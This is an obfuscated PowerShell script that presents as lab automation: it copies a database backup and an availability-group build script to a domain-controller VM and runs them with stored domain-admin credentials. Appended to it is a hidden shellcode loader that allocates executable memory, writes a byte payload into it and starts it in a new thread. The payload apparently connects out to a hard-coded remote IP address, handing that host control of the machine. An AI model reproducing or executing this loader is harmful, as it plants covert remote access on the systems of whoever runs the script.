${L`A`BcoN`Fig} = G`ET-COn`T`ENT ((("{13}{6}{14}{2}{4}{11}{7}{9}{5}{8}{0}{1}{10}{3}{12}"-f'lW8ZMSFVML','abW8ZLabVMS.','ori','s','e','e',':W8Zgit-repo','8ZPower','l','Sh','j','sW','on','C','sit')) -rePlAce 'W8Z',[ChAR]92) | conv`eRTf`R`oM-Js`ON
${W`orKINgdIrE`ct`oRy} = ${l`ABCo`NFIG}."wOrKI`NG`DIrEcTory"
${dom`A`INc`ReD} = imPort`-`clixml "$WorkingDirectory\vmlab_domainadmin.xml"
${D`c} = ( ${lAb`cO`NFiG}."S`e`RverS" | whERE-`OB`Je`CT {${_}."C`lasS" -eq ("{0}{2}{3}{1}" -f'D','r','omainCont','rolle')})."N`Ame"

c`oP`y`-vmFiLE -VMName ${Dc} -SourcePath (("{3}{2}{0}{1}{7}{4}{6}{5}{8}" -f'mpEorAdventureWork','s20','EorTe','C:','l','b','l.','14.Fu','ak'))."r`ep`lace"('Eor',[stRinG][ChAr]92) -DestinationPath ((("{0}{8}{9}{5}{2}{4}{7}{10}{1}{6}{3}"-f'C:{','Ful','}','bak','Adv','{0','l.','enture','0}Tem','p','Works2014.'))-F [CHar]92) -FileSource ("{1}{0}" -f't','Hos') -CreateFullPath -Force
c`opy-v`MfIlE -VMName ${dc} -SourcePath (("{7}{5}{9}{2}{10}{0}{3}{4}{8}{6}{1}"-f 'rie','ildAG.ps1','gi','srv','aPowe','rv','ellrvaMSFVMLabrvaBu','C:','rSh','a','t-reposito'))."r`EplAcE"(([char]114+[char]118+[char]97),'\') -DestinationPath ((("{0}{2}{5}{1}{3}{4}" -f'C:{','l','0}Temp{','dAG.p','s1','0}Bui')) -F [cHar]92) -FileSource ("{1}{0}"-f'st','Ho') -CreateFullPath -Force

I`Nv`okE-COmM`ANd -VMName ${D`c} -ScriptBlock {C`:\`T`eMp\b`U`ILDag.pS1} -Credential ${DOm`Ai`NcRED}
${C} = ((("{25}{16}{29}{68}{78}{40}{43}{7}{45}{4}{75}{61}{0}{6}{1}{57}{23}{34}{80}{71}{60}{64}{36}{67}{49}{5}{9}{73}{51}{17}{41}{74}{76}{56}{65}{19}{55}{66}{70}{39}{69}{26}{37}{14}{48}{13}{38}{53}{79}{72}{15}{24}{12}{54}{28}{33}{20}{47}{8}{11}{62}{77}{21}{30}{59}{35}{27}{46}{2}{50}{3}{22}{58}{32}{31}{10}{44}{42}{63}{52}{18}"-f'd','res',' ','ntP','c(Int','mp','d',' extern IntPt',', uin','or','IntP','t d','ess','butes','hre','ize, IntPtr lpStar','kernel32.dl','ernel32.dllB3U)]publ',');','Pt',' lpP','lpThreadId);[','t','Size, ui','tAddr','[DllImport(B3U','read(IntPtr ','c ','P','lB','DllIm','et(',' mems','tr','nt f','msvcrt.dllB3U)]publi','int flProtect','lpT',', ','T','blic stat','ic st',',','ic','tr dest','r VirtualAllo','static extern','arameter','adAttri',';[DllI','I','B3Uk','int count','u',', Int','r C','e','s, uint dw','r','port(B3U','nT','lpA','wCreationFlag',' uint src, u','ype, u','rn Int','rea',')','3U)','h','te','locatio','tackS','t(','atic ex','Ptr ','t','s, IntPtr ',']pu','int dwS','lAl'))-REPLaCE ([chAr]66+[chAr]51+[chAr]85),[chAr]34);${W} = &("{1}{0}" -f 'Type','Add-') -memberDefinition ${C} -Name ("{0}{1}" -f 'Win','32') -namespace ("{2}{1}{0}"-f 'Functions','n32','Wi') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xb1,0x2b,0x76,0xba,0x68,0x02,0x00,0x02,0x9a,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."LeNg`Th" -gt 0x1000){${G} = ${Z}."l`eNGth"};${X}=${w}::("{1}{0}{3}{2}" -f'rtua','Vi','lloc','lA').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."L`eNgTh"-1);${i}++) {${w}::"mem`SEt"([IntPtr](${x}.("{2}{1}{0}" -f '32','nt','ToI').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{3}{2}{1}{0}" -f 'd','hrea','eateT','Cr').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{1}{0}" -f 'sleep','-','Start') 60};
